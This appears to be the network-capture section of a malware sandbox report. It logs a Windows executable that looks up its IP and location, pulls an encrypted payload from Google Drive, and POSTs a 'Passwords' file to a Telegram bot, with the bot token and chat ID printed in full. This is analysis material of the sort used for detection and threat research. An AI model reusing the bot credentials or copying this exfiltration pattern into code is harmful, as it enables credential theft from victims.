                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                            8192.168.2.559259193.122.6.16880
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 20:24:28.900492907 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 20:24:29.556304932 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.559240142.250.181.2384435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:23:55 UTC216OUTGET /uc?export=download&id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: drive.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            2025-01-10 19:23:56 UTC1920INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 10 Jan 2025 19:23:56 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Security-Policy: script-src 'nonce-hx_TRSN0ECOYvX3A7tnFGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.559241142.250.185.1934435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:23:56 UTC258OUTGET /download?id=1lXVtdD0fIlICi_MAQ-2x5OrVMu-cSoWQ&export=download HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 19:23:59 UTC4940INHTTP/1.1 200 OK
                                                                                                            X-GUploader-UploadID: AFIdbgQzQxWFyXAx1ztwUZUJML7dTv4BjXKCIVf-awLMEQ1NV-fx0CTEkC0ZkBGQI9VyBEoO
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Security-Policy: sandbox
                                                                                                            Content-Security-Policy: default-src 'none'
                                                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                                                            X-Content-Security-Policy: sandbox
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                                                            Cross-Origin-Resource-Policy: same-site
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Content-Disposition: attachment; filename="httUJDCusfypXJSaz200.bin"
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Credentials: false
                                                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                            Accept-Ranges: bytes
                                                                                                            Content-Length: 94272
                                                                                                            Last-Modified: Sun, 15 Dec 2024 11:50:48 GMT
                                                                                                            Date: Fri, 10 Jan 2025 19:23:59 GMT
                                                                                                            Expires: Fri, 10 Jan 2025 19:23:59 GMT
                                                                                                            Cache-Control: private, max-age=0
                                                                                                            X-Goog-Hash: crc32c=8ttp3Q==
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close
                                                                                                            2025-01-10 19:23:59 UTC4940INData Raw: 86 6d 16 3d f5 c2 f8 4e 96 ec c7 c3 ab c4 f9 59 4a 2b 0b 64 b3 75 6f 80 46 80 e5 31 64 88 63 cd 9e f0 06 65 28 de 74 c2 6c 02 a6 2f 42 e2 6b 73 e2 8a 03 a9 9b 81 57 d4 b2 f8 08 09 a1 47 ec fa 69 c3 12 ac 22 d9 5d 96 4b e4 d8 64 86 4a 3c 1a b3 95 1b f5 34 f8 63 92 35 b0 e8 44 f4 6a 73 f1 07 75 12 35 32 41 98 ee cf 96 1f b2 cc 45 1b c3 bf 4d cc 28 a4 ff 96 56 7f 00 76 17 00 84 e1 60 1e a5 1f 1c 83 37 58 6a 4a ff 61 7b a8 33 9a a6 d6 5c 16 68 aa 42 af 87 42 99 e0 6b 60 4c bb 55 61 8a 1b d7 6f 6f e1 3c c9 f7 f8 d1 68 03 00 ed e9 cd 0b bc 92 5d c7 8e 45 fa 41 6b 6f 84 ed ef 92 23 f9 0a 19 10 2c e2 14 29 30 0b 4d 38 2f 0c cb 3d a2 f9 eb b6 df 06 ea 0e b6 dd 7e fc a2 f1 bd 7c 31 c8 f4 d0 48 19 23 00 2e a3 c6 fc 18 20 03 05 23 37 e8 29 b7 c3 3c f0 0b 26 bf 93 ea
                                                                                                            Data Ascii: m=NYJ+duoF1dce(tl/BksWGi"]KdJ<4c5Djsu52AEM(Vv`7XjJa{3\hBBk`LUaoo<h]EAko#,)0M8/=~|1H#. #7)<&
                                                                                                            2025-01-10 19:23:59 UTC4818INData Raw: b9 1b b7 4c bf b9 19 8d 20 30 e6 90 10 0f ce fc 45 e3 a2 30 38 51 1c e1 49 ce 6b 98 17 b0 5c 2f 65 59 c7 f5 7d 5f bf cd 6d 9e d0 91 95 0f 94 a1 17 86 48 ce 77 6c ef fd e4 fd fb 43 ce 24 ab 70 15 66 88 8d 07 14 c1 57 70 19 91 59 c2 49 8b d4 bc 51 ab 15 18 8e 29 a4 8f cf 80 7a 24 bb f3 a9 a3 20 b9 cc 8c 97 bc 69 c2 2c f0 68 60 43 ea 61 b4 dc 46 e8 78 8a a6 d1 70 4f 02 11 56 8f 54 0a 82 79 da 1a 51 f1 67 c9 57 cc 0b 7d 15 a3 94 2f 73 fa dc aa 94 2b 3a f4 53 db 54 ec 24 26 e0 59 c3 db 8a a6 75 e6 c6 d3 f4 7f 3a cc 80 f4 8b 61 59 f3 35 cf d9 20 b9 e2 c6 95 4f 71 80 d2 58 6b d1 30 3f 37 90 15 4a bb 12 89 4c 41 52 b4 93 13 79 4f e8 d7 a8 c3 92 0c 07 11 5d 48 e6 63 a4 a9 e5 e1 98 d6 0d 8e 38 a1 25 97 8d 22 5c 2b b8 46 10 b0 60 7a 32 12 b1 35 0f ec 1e 36 76 9b 43
                                                                                                            Data Ascii: L 0E08QIk\/eY}_mHwlC$pfWpYIQ)z$ i,h`CaFxpOVTyQgW}/s+:ST$&Yu:aY5 OqXk0?7JLARyO]Hc8%"\+F`z256vC
                                                                                                            2025-01-10 19:23:59 UTC1323INData Raw: 13 82 86 9a 2b 10 ba a1 3a 52 83 51 ad 16 0d 60 37 61 17 d8 cc c4 65 36 18 dc 2f b3 be 23 f4 c4 20 d3 22 d5 30 15 a8 7c 3c 26 60 d9 52 e9 9a 94 f3 57 01 53 cd 80 8a be d9 bc 5a b7 c8 61 fa 45 6b 6f ae ed ef c2 75 c9 08 55 8b 2f e2 a3 37 45 ba 5c 38 2d 77 8d 3d a2 fd 75 e5 dd 07 eb 27 b2 dd 7e 90 a9 f7 ae 70 20 cc d8 dd 4a 62 bb 85 2f a7 ee 0f 18 20 09 a5 22 37 ea 52 bd c3 3c d4 75 75 bf 91 e0 a1 f6 a2 7f 37 31 08 38 5c 15 98 5e 63 11 ea 16 6a 2f 58 35 a9 18 83 d1 7c 23 eb 08 4b 76 5d 01 e8 68 42 d9 3f 29 9c f2 5d ef 6a 9c 16 eb 93 b1 69 ac 37 9a e8 7a 61 7f 1a ee 01 e6 69 79 d9 6f 6f 03 00 2a 20 29 12 9e 10 32 5f 34 21 4a 75 ec 03 43 32 ca bf 70 fa 4f 96 1e 0b de 13 59 b4 a7 b0 43 d9 94 b9 79 a5 15 ab ce a3 53 3b 9a ae 9f 78 d1 55 49 aa dc ed 8f 39 92 ba
                                                                                                            Data Ascii: +:RQ`7ae6/# "0|<&`RWSZaEkouU/7E\8-w=u'~p Jb/ "7R<uu718\^cj/X5|#Kv]hB?)]ji7zaiyoo* )2_4!JuC2pOYCyS;xUI9
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: 49 06 52 ee f4 81 96 23 ee 9f 3f cf 67 0b ad 99 c5 4b 12 e9 c6 cd 14 f2 e4 04 95 89 83 f2 49 fb 00 f5 52 51 a0 5e 40 b8 93 8d 71 da 6d 7a 72 d5 a5 ac ac db 59 27 c6 fe 68 41 e1 49 37 b8 24 47 57 8d 2f 95 7c c8 36 4c 9b c5 d5 3c 65 70 e4 20 09 b8 6b fb 84 52 be 4c be 4e 5b d2 d0 8c da 9a 84 4d 81 f6 97 a8 21 16 06 e6 cd 66 c2 d6 d1 62 0b 21 45 5e 64 a4 d4 d9 ff d4 ec c6 ec 74 da 5a cf 71 71 e9 e2 6f 87 31 d3 fd 2d 0f a5 89 1e c3 5c 2d e5 28 71 ea 0b b7 03 96 06 12 4c cf ec 62 43 98 30 59 f9 05 d4 57 8d f6 81 30 4d 54 b8 f3 9a d0 04 f5 16 8a ca fb ce cc a6 6c c0 88 9c 6f 8b 20 ac b3 a0 d0 86 38 82 13 c6 57 dc 0c a8 09 37 f8 18 4d 09 28 40 12 ab 05 a3 2e ee c1 c3 0e 1c dc c5 12 93 43 da 36 37 d1 1b 0e 81 d0 d3 78 bb 71 38 57 32 0f 54 58 5a 24 49 a5 1f c5 0b
                                                                                                            Data Ascii: IR#?gKIRQ^@qmzrY'hAI7$GW/|6L<ep kRLN[M!fb!E^dtZqqo1-\-(qLbC0YW0MTlo 8W7M(@.C67xq8W2TXZ$I
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: 55 8f f9 f3 65 c5 b3 45 f2 07 73 41 d8 d5 02 1a 29 14 8a 61 bc b9 92 71 29 ed c3 55 68 d5 e5 e1 8e 5a 55 23 1b ea 71 57 8d 97 0d e9 d8 10 2f b2 cb e1 c3 38 42 39 30 38 8e 9d 48 c5 16 1d 81 d5 04 99 ad 88 71 ee a9 90 ae 43 f2 f7 85 55 c0 54 87 51 7f 23 64 e0 52 6e 0c f6 71 f9 a7 e2 73 f2 cf ba 56 38 ae 30 5a b7 d7 56 7c 14 5c 2d ce 0f f5 9f b8 56 7f fd b8 e3 c4 55 54 6e 1f c6 a5 5b 30 79 2d 99 48 62 2e 98 6a ee 45 1b f4 c6 b6 a7 90 a5 90 d9 44 1b 83 33 61 6c f4 a2 28 55 1e da 56 46 43 5e 26 cd c6 05 f2 14 ad a7 b8 1d 24 84 c0 a8 00 2c 5e c9 9e 01 94 ba 48 92 8b 0f 32 3a fd 5a 72 d5 1b 39 4d 0f 83 4a d2 78 81 2e 26 65 d6 6e 59 19 e8 6b 45 8d db 70 e0 ca 00 bd c1 94 7d c3 86 72 f7 5a 7e f0 df 32 f9 fb 61 b4 6a ab 7a c2 62 9c ff e5 11 c1 27 1d 21 80 4f b4 b9
                                                                                                            Data Ascii: UeEsA)aq)UhZU#qW/8B908HqCUTQ#dRnqsV80ZV|\-VUTn[0y-Hb.jED3al(UVFC^&$,^H2:Zr9MJx.&enYkEp}rZ~2ajzb'!O
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: e1 e9 9a 4d 84 bf da c2 32 02 f7 88 27 5e 82 35 5d 3f 34 b7 bb 78 c2 9e 4e 30 24 cf 2f 0e fd 52 81 9f 8a d0 49 01 79 85 e0 3f cb 21 a6 1b 85 c7 a9 5b 5a 3c 72 47 4b 45 c4 50 86 45 09 1e d0 7f d7 d9 89 56 c3 14 97 20 46 80 1e f6 07 ba 0f cd 97 7b 8e a0 c7 25 76 23 24 5e 44 4a 10 fb e3 8f 0b 55 bf c4 7d 80 6e 1f c2 52 57 d3 ca 16 82 f4 96 5f 4c 84 36 84 35 d7 10 11 cf 49 74 5d 14 04 4b bb 8a ef 2d 4a d7 ae dc 4c 9c 7a f4 59 57 72 6b 2a 0e 63 56 23 c0 88 a4 c0 13 6e 98 c8 27 72 f2 6f c2 28 35 53 74 02 ce 3a bf a0 8d cd 24 22 94 77 c4 59 9a d7 12 02 be dc c5 66 60 d7 1e 4f 37 ec 83 be d9 54 04 c4 4c 90 8e de 1e 04 c1 ee 4e 64 b5 1f 8f 4e b9 e0 fc d3 79 38 db 45 c6 6b 26 7a cc cd 3e 76 4e af dd dc 28 e8 30 cb 7f c8 82 4c e4 b9 30 52 e0 9b 8f b2 fe c8 db da ff
                                                                                                            Data Ascii: M2'^5]?4xN0$/RIy?![Z<rGKEPEV F{%v#$^DJU}nRW_L65It]K-JLzYWrk*cV#n'ro(5St:$"wYf`O7TLNdNy8Ek&z>vN(0L0R
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: 77 92 18 59 da 13 20 32 92 5a 16 d5 d9 c6 05 23 cb 0e e1 5b 0b 84 92 b3 91 34 1e 67 25 68 6a 07 94 50 4c 8b c0 43 a4 8a 14 5b 7d f3 3a 3e cd ab 00 73 31 a3 fb 37 40 fa 3d da bd 35 a5 cd 3e 83 51 c3 f4 45 84 31 85 bf 5e d1 78 ca 20 07 21 b2 c3 65 38 d5 48 92 01 db 16 70 b1 6e 05 5b f9 b0 3d a8 2e ec a1 21 b4 85 ad 7b b5 19 cf dd a3 dd aa 4d ec fa a3 ec aa f2 de 3c 3f 77 1a b9 70 4c a2 4e 86 6c 3e cf 60 a0 12 91 01 25 0a bf f0 3b 38 45 54 ea 65 58 12 eb f9 59 ed 8c 44 85 71 ae f5 2d 12 09 36 39 e0 97 cf ce 6f 85 06 38 8e f5 b6 94 bd 1d b2 66 5e 2a 45 b4 54 6a 32 0d cf b7 4f 2e bd 7d bd a0 df 04 98 55 d3 ab 30 06 a4 a9 bc ff 2c 25 8a fc 79 94 fe 67 0a 3c 09 49 14 6f 2c 23 6d 1d e4 22 f6 dd ac 21 d3 75 2a 4f e4 de 77 7c b5 2d 1e 79 77 1e f5 44 ee 4b 13 75 b0
                                                                                                            Data Ascii: wY 2Z#[4g%hjPLC[}:>s17@=5>QE1^x !e8Hpn[=.!{M<?wpLNl>`%;8ETeXYDq-69o8f^*ETj2O.}U0,%yg<Io,#m"!u*Ow|-ywDKu
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: e8 04 a6 b6 bc 62 fc f2 28 9c 3a 38 aa 60 d6 7c 9f 0d 10 ea 36 c1 b5 b7 ac 1a e9 ef 94 fe 57 a4 a3 12 f2 98 62 48 eb 27 43 dc 34 b3 83 b2 9e b1 70 97 ab db 6b fd 56 3f da 90 15 4a c5 84 e6 13 4b 52 c0 90 1a 51 de 9b 43 ae d0 9d 1f 00 00 70 07 73 4b 0e a3 f4 ec ff 51 0a fc ae bd 5b c7 e2 f7 58 58 29 29 4f ba 73 78 64 b5 b1 35 0d 8d 87 3d 67 ef 27 41 f7 34 6e fd 31 e3 62 1e e2 21 b8 59 62 90 e2 3f 38 46 1f a7 46 94 1d be 1a 16 52 0d af de 71 7b 5f 4e 6d 8b 4e 47 58 ae 08 63 44 b6 51 ca 9a aa 66 20 67 4b 37 0b c8 46 16 61 21 55 b0 8e e4 3b bd 89 ca da 3b d0 48 a5 a7 57 2a 1e 19 64 51 63 36 c9 98 24 65 d9 b8 e4 08 ce d3 c2 eb a3 1e cc fe d1 b5 15 62 a8 81 de 5e 05 bd 29 f4 81 94 81 cb 96 4a f4 a4 18 da 2a e7 43 1d b8 e2 33 eb 0b 46 21 51 eb e0 cf 7a 8b a2 da
                                                                                                            Data Ascii: b(:8`|6WbH'C4pkV?JKRQCpsKQ[XX))Osxd5=g'A4n1b!Yb?8FFRq{_NmNGXcDQf gK7Fa!U;;HW*dQc6$eb^)J*C3F!Qz
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: d5 83 62 b4 d2 1a 67 e2 03 46 5d 62 32 aa 79 02 84 6e 47 04 a4 31 4f 8e d1 6d a4 b7 c6 b4 8e 61 a0 87 f8 fe 22 79 4c da c0 6f 19 cd 67 9b 6b b6 a6 67 15 94 ce 8d a8 a6 4b 04 1a cb 5d 11 78 ba ce 37 ec e4 96 11 2b 2a 8f a5 65 43 2f d0 ab eb d6 e8 75 a7 5a 20 f3 75 70 a7 76 ea e6 4b 65 f8 18 af 9b 3d a4 3b 0e ca 96 4e 35 70 8e f6 91 36 81 41 15 41 cf 7d 93 67 02 5e 25 9f 1f 17 db 08 96 d3 cd 4f 24 72 cd ba fa 05 38 8e af fb c1 3a c8 dd 48 db 37 ec 17 98 60 c5 f1 7d 1f ae 03 f6 1d 1b e9 92 5a 7d aa 8e 62 97 cd 6b e6 6e c0 ce b4 1a 08 01 61 0d 53 3a ff bf 65 ba 37 89 af 3c 37 90 cf e1 06 1f 0b 12 fc c5 b4 1d c5 55 2f e3 b2 6d 1e 21 c2 1e 16 b8 1a 4a 8d 02 00 57 ee af f9 76 b8 e4 7e f0 07 75 76 dc ab dc 80 3a 1c 8c b5 dc 51 84 62 24 c6 db 45 66 c4 e3 82 d9 32
                                                                                                            Data Ascii: bgF]b2ynG1Oma"yLogkgK]x7+*eC/uZ upvKe=;N5p6AA}g^%O$r8:H7`}Z}bknaS:e7<7U/m!JWv~uv:Qb$Ef2
                                                                                                            2025-01-10 19:23:59 UTC1390INData Raw: fb 23 dc 92 08 01 28 0b 3a 15 80 38 ae 4f 1d 94 52 e9 9e 85 f1 2c 4c 04 cc 84 a2 05 d8 bc 50 da 84 61 fa 05 6b 6f 85 f6 df c6 66 85 0b 55 11 1c e2 a3 02 45 a5 51 10 f7 0c cb 37 d0 60 2e b6 ad 2f af 0f e6 d7 74 9a a5 d9 45 74 31 c2 ff d7 71 5f fc 85 2f a5 b5 0b 18 20 05 a9 2a 45 b2 35 f7 b3 53 02 0b 26 b9 b7 e2 e6 71 a2 7f 3b 2d d5 38 5f 12 8e 75 56 04 90 5c 6a 27 4d 1a 08 70 9f db 0c 4c 3e 0a 30 38 50 09 fd 11 63 a7 23 23 c4 c9 88 ef 60 96 0d fc 9d b1 68 f2 a6 84 93 42 0e aa 1e c6 d4 f5 6c 62 dc 47 fc 01 7b 60 33 21 07 e8 6f 71 59 16 0a 1f 75 e6 66 4a 3a d9 b2 0e f8 62 9b 16 58 06 13 59 b6 9c 6a 52 d0 8a 47 78 b6 35 ba c4 ae 9d 30 89 8f 8f 73 fd 66 61 00 cd ed 87 56 aa d5 85 d4 38 23 e6 87 25 cb 82 2e 6b 2a 31 a5 ba 78 e9 8f 4e 18 9f cf 2d 76 3d 58 86 9d
                                                                                                            Data Ascii: #(:8OR,LPakofUEQ7`./tEt1q_/ *E5S&q;-8_uV\j'MpL>08Pc##`hBlbG{`3!oqYufJ:bXYjRGx50sfaV8#%.k*1xN-v=X


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.559243104.21.64.14435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 19:24:03 UTC860INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 19:24:03 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 362
                                                                                                            Connection: close
                                                                                                            Age: 1851832
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            cf-cache-status: HIT
                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X4%2F8PIRSDBweMt1Npqee4fDziEp21IiP2RgJWuK6LCGG456IHHclBC0gcm9hHBdAdIJOpd6hnoyun3Zpp2hannXvfgh%2BhWvnn2%2FFvHL%2F%2Fp7CO8FQwohOKpfPqBmfWKORmCcRKcd%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8fff0b88bbab42e9-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1750&rtt_var=875&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=202946&cwnd=240&unsent_bytes=0&cid=6c36be65a3ed9cf1&ts=175&x=0"
                                                                                                            2025-01-10 19:24:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.559244149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:10 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd3182720a9442
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-01-10 19:24:10 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 32 37 32 30 61 39 34 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd3182720a9442Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2025-01-10 19:24:10 UTC347INHTTP/1.1 401 Unauthorized
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Fri, 10 Jan 2025 19:24:10 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 58
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2025-01-10 19:24:10 UTC58INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 31 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 55 6e 61 75 74 68 6f 72 69 7a 65 64 22 7d
                                                                                                            Data Ascii: {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.559246149.154.167.2204435852C:\Users\user\Desktop\FILHKLtCw0.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-01-10 19:24:14 UTC296OUTPOST /bot7782841068:AAEc-nCmeaG2WG8noQ4QtMz2nBxG0zDBxvA/sendDocument?chat_id=1934716051&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd31b1cb1e2887
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1090
                                                                                                            Connection: Keep-Alive
